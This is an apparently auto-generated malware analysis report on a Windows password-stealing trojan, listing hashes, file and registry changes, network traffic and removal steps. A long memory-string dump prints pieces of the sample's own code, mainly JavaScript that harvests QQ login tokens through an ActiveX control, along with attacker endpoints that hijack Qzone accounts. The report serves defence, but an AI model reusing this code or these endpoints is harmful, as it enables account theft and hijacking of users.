Trojan.Win32.Gofot.frc (Kaspersky), Gen:Variant.Graftor.112914 (B) (Emsisoft), Gen:Variant.Graftor.112914 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: e48aab3ebe9c90ab28ddf9ae34572704
SHA1: 80a93f3fdcc982c28c0fb67268ed6372a793bd5a
SHA256: f6cf59e76a45535b9839fa5b2444915179fae7174e97411264f2af202e9998d8
SSDeep: 24576:djco9HBcyy9wYbqdu Uy3kmaJBgFB2b5HDubJQ5eseDX2nXUXNNVi:eIymLUy3kmambOeDCMN7i
Size: 1552384 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2016-12-01 09:40:58
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users passwords.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:3380
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\winhelp.ini (381 bytes)
C:\Windows\0cm7.dll (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\udp[1].htm (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\fs[1].htm (52 bytes)
C:\Windows\System32\ML4v.txt (31 bytes)
C:\Windows\System32\JiTG.txt (52 bytes)
C:\Windows\1kmu.exe (50 bytes)
C:\Windows\System32\6298.txt (31 bytes)
The Trojan deletes the following file(s):
C:\Windows\winhelp.ini (0 bytes)
C:\Windows\System32\JiTG.txt (0 bytes)
C:\Windows\System32\ML4v.txt (0 bytes)
C:\Windows\System32\6298.txt (0 bytes)
Registry activity
The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\e48aab3ebe9c90ab28ddf9ae34572704_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
a82965d35bcabacf7a2cae338b2c62a6 | c:\Windows\0cm7.dll |
7a7ac06a379148ff23ca3e9c3b90b07b | c:\Windows\1kmu.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3380
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\winhelp.ini (381 bytes)
C:\Windows\0cm7.dll (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\udp[1].htm (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\fs[1].htm (52 bytes)
C:\Windows\System32\ML4v.txt (31 bytes)
C:\Windows\System32\JiTG.txt (52 bytes)
C:\Windows\1kmu.exe (50 bytes)
C:\Windows\System32\6298.txt (31 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 55490 | 57344 | 4.45163 | 0e44623b93ac4c84c970bed81ecdba2e |
.rdata | 61440 | 14966 | 16384 | 3.20399 | cb8c4aafd8e935c7c54fe5ada7e940ea |
.data | 77824 | 1482208 | 1474560 | 4.34935 | 40d7545c8f51594c27bdbdf1f7851de0 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://ipaddress.wb916.com/udp.htm | 120.55.106.30 |
hxxp://ipaddress.wb916.com/fs.aspx | 120.55.106.30 |
dns.msftncsi.com | 131.107.255.255 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /udp.htm HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: ipaddress.wb916.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 31
Content-Type: text/html
Last-Modified: Fri, 25 Nov 2016 18:01:38 GMT
Accept-Ranges: bytes
ETag: "d639eaf74547d21:1324"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 08 Dec 2016 17:01:46 GMT
[120.55.106.30|120.55.106.30]......
GET /fs.aspx HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: ipaddress.wb916.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 08 Dec 2016 17:01:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30128
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52
......IP...:..[194.242.96.218]........:(.........)..HTTP/1.1 200 OK..Date: Thu, 08 Dec 2016 17:01:48 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 4.0.30128..Cache-Control: private..Content-Type: text/html; charset=utf-8..Content-Length: 52........IP...:..[194.242.96.218]........:(.........)....
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_3380:
.text
.text
`.rdata
`.rdata
@.data
@.data
diu2.iuG?iu
diu2.iuG?iu
CCmdTarget
CCmdTarget
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
COMCTL32.DLL
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
comdlg32.dll
comdlg32.dll
WINSPOOL.DRV
WINSPOOL.DRV
COMCTL32.dll
COMCTL32.dll
GetCPInfo
GetCPInfo
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
c:\windows\
c:\windows\
.reloc
.reloc
WS2_32.dll
WS2_32.dll
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
ShellExecuteA
ShellExecuteA
ole32.dll
ole32.dll
10.dll
10.dll
\config.ini
\config.ini
qq.exe
qq.exe
.rsrc
.rsrc
t%SVh
t%SVh
t$(SSh
t$(SSh
~%UVW
~%UVW
u.hxHN
u.hxHN
u$SShe
u$SShe
kernel32.dll
kernel32.dll
shlwapi.dll
shlwapi.dll
Kernel32.dll
Kernel32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
ws2_32.dll
ws2_32.dll
oleaut32.dll
oleaut32.dll
OleAut32.dll
OleAut32.dll
atl.dll
atl.dll
Winhttp.dll
Winhttp.dll
wininet.dll
wininet.dll
WinHttpCheckPlatform
WinHttpCheckPlatform
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpOpen
WinHttpOpen
WinHttpConnect
WinHttpConnect
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpSetTimeouts
WinHttpSetTimeouts
WinHttpSetCredentials
WinHttpSetCredentials
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpSetOption
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReadData
WinHttpQueryHeaders
WinHttpQueryHeaders
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
WebBrowser
WebBrowser
socket_udp
socket_udp
120.55.106.30
120.55.106.30
120.55.148.93
120.55.148.93
.txt?
.txt?
hXXp://list.uc916.com:7000/server/qzone/
hXXp://list.uc916.com:7000/server/qzone/
\sdfDll.ini
\sdfDll.ini
154396063
154396063
(*^__^*)
(*^__^*)
hXXp://api.t.sina.com.cn/short_url/shorten.json?source=3213676317&url_long=
hXXp://api.t.sina.com.cn/short_url/shorten.json?source=3213676317&url_long=
[0].url_short
[0].url_short
hXXp://
hXXp://
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
ipaddress.wb916.com
ipaddress.wb916.com
/fs.aspx
/fs.aspx
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
hXXp://ipaddress.wb916.com/udp.htm
hXXp://ipaddress.wb916.com/udp.htm
120.55.106.30|120.55.148.93
120.55.106.30|120.55.148.93
|qqkey|
|qqkey|
SSOAxCtrlForPTLogin.SSOForPTLogin2
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
\npSSOAxCtrlForPTLogin.dll
\npSSOAxCtrlForPTLogin.dll
\SSOCommon.dll
\SSOCommon.dll
\SSOLUIControl.dll
\SSOLUIControl.dll
\SSOPlatform.dll
\SSOPlatform.dll
%System%\regsvr32.exe /s /u "
%System%\regsvr32.exe /s /u "
%System%\regsvr32.exe /s "
%System%\regsvr32.exe /s "
&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com&clientkey=
&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://ptlogin2.qq.com/jump?clientuin=
ptui_qlogin_CB('0', '
ptui_qlogin_CB('0', '
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=
msglist
msglist
].content
].content
msglist[
msglist[
].rt_uin
].rt_uin
].pic
].pic
].height
].height
].pic[
].pic[
].width
].width
].tid
].tid
p_skey=(.*?);
p_skey=(.*?);
http=
http=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Adodb.Stream
Adodb.Stream
WinHttp
WinHttp
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_delete_v6?g_tk=
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_delete_v6?g_tk=
/311&hostuin=
/311&hostuin=
qzreferrer=http://user.qzone.qq.com/
qzreferrer=http://user.qzone.qq.com/
hXXp://w.qzone.qq.com/cgi-bin/right/set_entryright.cgi?g_tk=
hXXp://w.qzone.qq.com/cgi-bin/right/set_entryright.cgi?g_tk=
/profile/permit&flag=0x0&fupdate=1&uin=
/profile/permit&flag=0x0&fupdate=1&uin=
/profile/permit&flag=0x20101&fupdate=1&uin=
/profile/permit&flag=0x20101&fupdate=1&uin=
/profile/permit&flag=0x40000&fupdate=1&uin=
/profile/permit&flag=0x40000&fupdate=1&uin=
/profile/permit
/profile/permit
frameElement.callback(
frameElement.callback(
hXXp://w.qzone.qq.com/cgi-bin/right/set_revertright.cgi?g_tk=
hXXp://w.qzone.qq.com/cgi-bin/right/set_revertright.cgi?g_tk=
/profile/permit&fupdate=1&uin=
/profile/permit&fupdate=1&uin=
hXXp://user.qzone.qq.com/p/r/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=
hXXp://user.qzone.qq.com/p/r/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=
data.items
data.items
].uin
].uin
data.items[
data.items[
].name
].name
hXXp://union.uc916.com/zone/get
hXXp://union.uc916.com/zone/get
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_forward_v6?g_tk=
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_forward_v6?g_tk=
hXXp://union.uc916.com/zone/set
hXXp://union.uc916.com/zone/set
,nick:
,nick:
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_re_feeds?g_tk=
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_re_feeds?g_tk=
skey=
skey=
Content-Disposition: form-data; name="skey"
Content-Disposition: form-data; name="skey"
skey
skey
1.jpg
1.jpg
Content-Disposition: form-data; name="filename"; filename="1.jpg"
Content-Disposition: form-data; name="filename"; filename="1.jpg"
hXXp://shup.photo.qq.com/cgi-bin/upload/cgi_upload_image
hXXp://shup.photo.qq.com/cgi-bin/upload/cgi_upload_image
&special_url=&subrichtype=1&pic_bo=
&special_url=&subrichtype=1&pic_bo=
/311&syn_tweet_verson=1¶mstr=1&pic_template=&richtype=1&richval=
/311&syn_tweet_verson=1¶mstr=1&pic_template=&richtype=1&richval=
/311&syn_tweet_verson=1¶mstr=1&pic_template=tpl-
/311&syn_tweet_verson=1¶mstr=1&pic_template=tpl-
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
https
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
HTTP/1.1
HTTP/1.1
hXXps://
hXXps://
hXXp://b1.qzone.qq.com/cgi-bin/blognew/add_blog?g_tk=
hXXp://b1.qzone.qq.com/cgi-bin/blognew/add_blog?g_tk=
&iNotice=1&inCharset=utf-8&outCharset=utf-8&format=fs&ref=qzone&json=1&g_tk=800267314&secverifykey=28Q1206
&iNotice=1&inCharset=utf-8&outCharset=utf-8&format=fs&ref=qzone&json=1&g_tk=800267314&secverifykey=28Q1206
qzreferrer=http://ctc.qzs.qq.com/qzone/newblog/v5/editor.html#opener=refererurl&source=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&cate=个人日记&title=
qzreferrer=http://ctc.qzs.qq.com/qzone/newblog/v5/editor.html#opener=refererurl&source=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&cate=个人日记&title=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_save?g_tk=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_save?g_tk=
&share2weibo=0&onekey=0&comment=0&entryuin=
&share2weibo=0&onekey=0&comment=0&entryuin=
qzreferrer=http://ctc.qzs.qq.com/qzone/app/qzshare/popup.html¬ice=1&fupdate=1&platform=qzone&token=1594827009&auto=0&type=blog&description=
qzreferrer=http://ctc.qzs.qq.com/qzone/app/qzshare/popup.html¬ice=1&fupdate=1&platform=qzone&token=1594827009&auto=0&type=blog&description=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareaddcomment?fupdate=2&g_tk=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareaddcomment?fupdate=2&g_tk=
&spaceuin=0&isfriend=1&uin=
&spaceuin=0&isfriend=1&uin=
qzreferrer=http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzsharegetmylistbytype?uin=
qzreferrer=http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzsharegetmylistbytype?uin=
hXXp://b11.qzone.qq.com/cgi-bin/blognew/add_comment?g_tk=
hXXp://b11.qzone.qq.com/cgi-bin/blognew/add_comment?g_tk=
&secverifykey=28Q1206
&secverifykey=28Q1206
&dprefix=&inCharset=gb2312&outCharset=gb2312&ref=qzone&page=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&uin=
&dprefix=&inCharset=gb2312&outCharset=gb2312&ref=qzone&page=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&uin=
&styledm=ctc.qzonestyle.gtimg.cn&imgdm=ctc.qzs.qq.com&bdm=b.qzone.qq.com&mode=2&numperpage=15×tamp=
&styledm=ctc.qzonestyle.gtimg.cn&imgdm=ctc.qzs.qq.com&bdm=b.qzone.qq.com&mode=2&numperpage=15×tamp=
&blogid=
&blogid=
qzreferrer=http://b11.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
qzreferrer=http://b11.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
1970-01-01 08:00:00
1970-01-01 08:00:00
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=
&type=4&url=
&type=4&url=
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Referer: hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.ecyc.net?v0TPk3ocH5
Referer: hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.ecyc.net?v0TPk3ocH5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.7.1000 Chrome/30.0.1599.101 Safari/537.36
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.7.1000 Chrome/30.0.1599.101 Safari/537.36
Origin: hXXp://sns.qzone.qq.com
Origin: hXXp://sns.qzone.qq.com
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_timershuoshuo_v6?g_tk=
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_timershuoshuo_v6?g_tk=
&clientkey=
&clientkey=
&keyindex=9&pt_aid=715030901&daid=371&u1=http://buluo.qq.com/p/barindex.html?bid=
&keyindex=9&pt_aid=715030901&daid=371&u1=http://buluo.qq.com/p/barindex.html?bid=
ptui_qlogin_CB(
ptui_qlogin_CB(
&source=2&extparam={"client_type":4}&bkn=
&source=2&extparam={"client_type":4}&bkn=
Host: buluo.qq.com
Host: buluo.qq.com
Origin: hXXp://buluo.qq.com
Origin: hXXp://buluo.qq.com
X-Requested-With: XMLHttpRequest
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: hXXp://buluo.qq.com/p/barindex.html?bid=230661
Referer: hXXp://buluo.qq.com/p/barindex.html?bid=230661
hXXp://buluo.qq.com/cgi-bin/bar/site/post/pub_rich_post
hXXp://buluo.qq.com/cgi-bin/bar/site/post/pub_rich_post
hXXp://captcha.qq.com/getimage?aid=716013036&v=0.
hXXp://captcha.qq.com/getimage?aid=716013036&v=0.
c:/teset.jpg
c:/teset.jpg
17004455
17004455
hXXp://buluo.qq.com/cgi-bin/bar/post/captcha/verify_v2
hXXp://buluo.qq.com/cgi-bin/bar/post/captcha/verify_v2
hXXp://union.uc916.com/zone/list
hXXp://union.uc916.com/zone/list
hXXp://buluo.qq.com/p/detail.html?bid=
hXXp://buluo.qq.com/p/detail.html?bid=
&like=1&source=2&extparam={"client_type":4}&r=0.
&like=1&source=2&extparam={"client_type":4}&r=0.
hXXp://buluo.qq.com/cgi-bin/bar/post/like
hXXp://buluo.qq.com/cgi-bin/bar/post/like
","pic_list":[{"url":"
","pic_list":[{"url":"
&coordinate=1&source=2&extparam={"client_type":4}&pid=
&coordinate=1&source=2&extparam={"client_type":4}&pid=
hXXp://buluo.qq.com/cgi-bin/bar/post/comment_v2
hXXp://buluo.qq.com/cgi-bin/bar/post/comment_v2
------WebKitFormBoundarya59o1fM4ajrut49e
------WebKitFormBoundarya59o1fM4ajrut49e
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Disposition: form-data; name="file"; filename="1.jpg"
------WebKitFormBoundarya59o1fM4ajrut49e--
------WebKitFormBoundarya59o1fM4ajrut49e--
Host: upload.buluo.qq.com
Host: upload.buluo.qq.com
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarya59o1fM4ajrut49e
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarya59o1fM4ajrut49e
Referer: hXXp://buluo.qq.com/buluoadmin/for-crossdomain.html
Referer: hXXp://buluo.qq.com/buluoadmin/for-crossdomain.html
hXXp://upload.buluo.qq.com/cgi-bin/bar/upload/image?callback=singleImgUpload
hXXp://upload.buluo.qq.com/cgi-bin/bar/upload/image?callback=singleImgUpload
url":"
url":"
hXXp://union.uc916.com/zone/del?userId=
hXXp://union.uc916.com/zone/del?userId=
c:\windows\iextadd.dat
c:\windows\iextadd.dat
\delext .bat
\delext .bat
var t=$.activetxsso,e=t.CreateTXSSOData();
var t=$.activetxsso,e=t.CreateTXSSOData();
t.InitSSOFPTCtrl(0,e);
t.InitSSOFPTCtrl(0,e);
var i=t.DoOperation(1,e);
var i=t.DoOperation(1,e);
for(var o=i.GetArray("PTALIST"),p=o.GetSize(),r=0;
for(var o=i.GetArray("PTALIST"),p=o.GetSize(),r=0;
var a=o.GetData(r),c=a.GetDWord("dwSSO_Account_dwAccountUin"),u=a.GetDWord("dwSSO_Account_dwAccountUin"),g="",d=a.GetByte("cSSO_Account_cAccountType"),h=c;
var a=o.GetData(r),c=a.GetDWord("dwSSO_Account_dwAccountUin"),u=a.GetDWord("dwSSO_Account_dwAccountUin"),g="",d=a.GetByte("cSSO_Account_cAccountType"),h=c;
g=a.GetArray("SSO_Account_AccountValueList"),h=g.GetStr(0)
g=a.GetArray("SSO_Account_AccountValueList"),h=g.GetStr(0)
m=a.GetWord("wSSO_Account_wFaceIndex")
m=a.GetWord("wSSO_Account_wFaceIndex")
_=a.GetStr("strSSO_Account_strNickName")
_=a.GetStr("strSSO_Account_strNickName")
for(var v=a.GetBuf("bufST_PTLOGIN"),w="",y=v.GetSize(),b=0;
for(var v=a.GetBuf("bufST_PTLOGIN"),w="",y=v.GetSize(),b=0;
var k=v.GetAt(b).toString("16");
var k=v.GetAt(b).toString("16");
1==k.length&&(k="0" k),w =k
1==k.length&&(k="0" k),w =k
document.body.innerHTML=qq754497519();
document.body.innerHTML=qq754497519();
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=522005705&daid=4&s_url=hXXps://mail.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=522005705&daid=4&s_url=hXXps://mail.qq.com
hXXp://api.ruokuai.com/register.xml
hXXp://api.ruokuai.com/register.xml
hXXp://api.ruokuai.com/info.xml
hXXp://api.ruokuai.com/info.xml
hXXp://api.ruokuai.com/recharge.xml
hXXp://api.ruokuai.com/recharge.xml
hXXp://api.ruokuai.com/create.xml
hXXp://api.ruokuai.com/create.xml
hXXp://api.ruokuai.com/reporterror.xml
hXXp://api.ruokuai.com/reporterror.xml
VBScript.RegExp
VBScript.RegExp
MSScriptControl.ScriptControl
MSScriptControl.ScriptControl
if (typeof Date.prototype.toJSON !== 'function') {
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf()) ?
return isFinite(this.valueOf()) ?
this.getUTCFullYear() '-'
this.getUTCFullYear() '-'
f(this.getUTCMonth() 1) '-'
f(this.getUTCMonth() 1) '-'
f(this.getUTCDate()) 'T'
f(this.getUTCDate()) 'T'
f(this.getUTCHours()) ':'
f(this.getUTCHours()) ':'
f(this.getUTCMinutes()) ':'
f(this.getUTCMinutes()) ':'
f(this.getUTCSeconds()) 'Z' : null;
f(this.getUTCSeconds()) 'Z' : null;
String.prototype.toJSON =
String.prototype.toJSON =
Number.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
return this.valueOf();
'"' : '\\"',
'"' : '\\"',
'\\': '\\\\'
'\\': '\\\\'
escapable.lastIndex = 0;
escapable.lastIndex = 0;
return escapable.test(string) ? '"' string.replace(escapable, function (a) {
